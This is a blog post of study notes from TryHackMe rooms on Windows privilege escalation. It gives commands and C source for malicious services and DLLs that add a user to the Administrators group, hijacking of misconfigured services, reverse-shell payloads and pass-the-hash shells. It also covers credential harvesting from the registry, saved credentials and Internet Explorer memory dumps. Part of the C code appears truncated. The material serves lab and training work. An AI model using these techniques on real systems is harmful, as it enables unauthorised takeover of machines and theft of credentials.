TryHackMe | Windows Privilege Escalation

In this post, I summarize lessons learned from two rooms covering Windows Privilege Escalation on TryHackMe
In: TryHackMe, Attack


These are just some of the things you can try to escalate privilege on a Windows system. This is not meant to be an exhaustive list, and is just scratching the surface of Windows privilege escalation.

Be flexible and diligent in your checks. Most of these are just examples and you don't have to follow them word-for-word. Check other services, other files, other registry keys, use these as an example.



Method 1: Registry

  • Check for autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • If there are any autorun programs, you may be able to overwrite the binary
  • Use the accesschk.exe or icacls to check your permissions on this directory
    • accesschk.exe /accepteula -wvu C:\Program Files\Autorun Program\
    • If any of the files are writable, can overwrite with a reverse shell payload
    • When an administrative user logs on, we can get an elevated shell
    • Need to have listener running continuously to catch logons


  • Check if the AlwaysInstallElevated setting has been enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • If either of those queries return 1, can get an elevated shell
  • Use msfvenom to create an .msi payload and run it on the target
    • Start a listener
    • Run this commamnd to install the malicious program
msiexec /quiet /qn /i <path to msi>



  • Open PowerShell and check your permissions on this regitry key
Get-Acl hklm:\System\CurrentControlSet\services\regsvc
  • If your user accout or a group you're a member of can register services, then you can create a malicious service to perform a privileged task
  • Create a dummy Windows service
    • An example service is shown below
      • Modify the source code here
      • Enter the command in system()
    • Use the command cmd.exe /k net localgroup administrators user /add
    • This will add the current user to the Administrators local group
  • In Kali, compile the .c code to a .exe
x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe
  • Transfer privesc.exe to a writable folder on the target
  • Register the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d [C:\Path\to\privesc.exe] /f
  • Start the service
sc.exe start regsvc
  • Confirm the current user has been added to the local administrator group


#include <windows.h>  
#include <stdio.h>  
#define SLEEP_TIME 5000  
SERVICE_STATUS ServiceStatus;    
void ServiceMain(int argc, char** argv);    
void ControlHandler(DWORD request);    
//add the payload here  
int Run()    
   system("cmd.exe /k net localgroup administrators user /add");  
   return 0;    
int main()    
   SERVICE_TABLE_ENTRY ServiceTable[2];  
   ServiceTable[0].lpServiceName = "MyService";  
   ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;  
   ServiceTable[1].lpServiceName = NULL;  
   ServiceTable[1].lpServiceProc = NULL;  
   return 0;  
void ServiceMain(int argc, char** argv)    
   ServiceStatus.dwServiceType        = SERVICE_WIN32;    
   ServiceStatus.dwCurrentState       = SERVICE_START_PENDING;    
   ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN  
   ServiceStatus.dwWin32ExitCode      = 0;    
   ServiceStatus.dwServiceSpecificExitCode = 0;    
   ServiceStatus.dwCheckPoint         = 0;    
   ServiceStatus.dwWaitHint           = 0;    
   hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandl  
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;    
   SetServiceStatus (hStatus, &ServiceStatus);  
   while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)  
void ControlHandler(DWORD request)    
       case SERVICE_CONTROL_STOP:    
                       ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
           ServiceStatus.dwWin32ExitCode = 0;    
           ServiceStatus.dwCurrentState  = SERVICE_STOPPED;    
           SetServiceStatus (hStatus, &ServiceStatus);  
   SetServiceStatus (hStatus,  &ServiceStatus);  

File Permissions Service

  • You can follow this process on other services as well
    • The File Permissions Service is just used here as an example
  • Check the configuration of filepermsvc
sc.exe qc filepermsvc
  • Note that it runs as SYSTEM
  • See if you or a group you're in can modify the service
accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
  • For example, if Everyone has FILE_ALL_ACCESS, you can overwrite the service binary, so when the service starts, the malicious binary is run
  • Using the windows_service.c service from before
    • Or, could be a reverse shell to spawn a SYSTEM shell
    • Copy privesc.exe as C:\Program Files\File Permissions Service\filepermservice.exe
  • Run this command to restart the service
sc.exe stop filepermsvc && start filepermsvc
  • Current user should have been added to local administrator group

DLL Hijacking

  • In this example, a service loads a DLL from a directory where we have write permissions
    • We can determine this by running procmon on the target
    • Or by running the executable copied from the target on a test machine
  • We can create a malicious DLL that will be loaded by the service instead
    • Compile the C code to DLL on Kali:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll
  • Copy the DLL to the target path
  • Start the service
sc.exe start <service>

Example DLL Code

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll  
#include <windows.h>  
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {  
   if (dwReason == DLL_PROCESS_ATTACH) {  
       system("cmd.exe /k net localgroup administrators user /add");  
   return TRUE;  

Insecure Service Permissions

  • Similar to the File Permissions Service attack before
  • Check a service's permissions to see if we can modify it
    • In this example, we're checking daclsvc , but other services should be checked as well
accesschk.exe /accepteula -uwcqv daclsvc
accesschk64.exe /accepteula -wuvc daclsvc
  • Query the service to see if it runs as System
sc.exe qc daclsvc
  • If we have SERVICE_CHANGE_CONFIG, we can manipulate a service
sc.exe config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
  • This will add the current user to the local Administrators group when the service is started or restarted

Unquoted Service Path

  • sc.exe qc <service> to query a service
  • Especially useful if a service is running as NT Authority\SYSTEM
  • If a service's BINARY_PATH_NAME is not wrapped in quotes
    • Example: C:\Program Files\Service Directory\awesome.exe
    • We need to find if any part of that path is writable
    • If C:\ is writable, we can create a Program.exe payload
    • If C:\Program Files\ is writable, we can a create Service.exe payload
    • If C:\Program Files\Service Directory\ is writable, we can create an awesome.exe payload

Startup Applications

  • In a lower privileged shell, run
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • If BUILTIN\Users has (F), we can add a payload there
  • Use msfvenom to generate a reverse shell exe payload
  • Put the payload in the folder
  • Start a listener
  • Wait for an admin to login

Passing the Hash


  • pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
  • If you have a hash of a user
  • This is just an example, I've written more notes here on passing the hash

Scheduled Tasks

  • Check for scheduled tasks running as privileged accounts
  • If the task is running a script, check the permissions on the script
accesschk.exe /accepteula -quvw user C:\path\to\script
  • May be able to overwrite or modify the script contents
  • Could run a command or reverse shell

Hot Potato


  • Invoke-Tater.ps1
  • If the host is vulnerable to the Hot Potato privilege escalation, will run commands as System , as we will be able to impersonate the SYSTEM account
  • Import the script
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add
  • Current user should now be a member of the local administrators group

Password Mining


  • Search for the word password recursively
reg query HKLM /f password /t REG_SZ /s
  • Might be something here as a quick search
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  • Spawn an admin shell from Kali
winexe -U 'username%password' //target-ip cmd.exe
  • This is just an example. I've written more notes here on passing the password.


  • cmdkey /list to list any saved credentials
  • Start a reverse shell as the user
runas /savecred /user:username C:\PrivEsc\reverse.exe


  • Check the <Password> property for a base64 encoded password

Internet Explorer Memory Dump

  • Start msfconsole
use auxiliary/server/capture/http_basic
set uripath pwn
  • Victim
    • Open Internet Explorer
    • Go to http://kali-ip/pwn
    • Open Task Manager
    • Right-click iexpore.exe > Image Name > Create Dump File
    • Transfer the .DMP file to Kali
  • Kali
    • Check if there are any saved credentials in the IE dump
strings file.DMP | grep "Authorization: Basic"
  • If so, decode the base64 string.
echo -ne "base64string" | base64 -d

GUI Apps

Run as Admin

  • If a GUI app is set to run as admin at launch
    • Example: MS Paint
      • Launch Paint
        • File > Open
        • Enter file://C:/Windows/System32/cmd.exe

Kernel Exploits


  • Can run exploit suggesting scripts to detect kernel exploits
  • winPEASany.exe
  • Seatbelt.exe
  • PowerUp.ps1
  • SharpUp.exe

More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.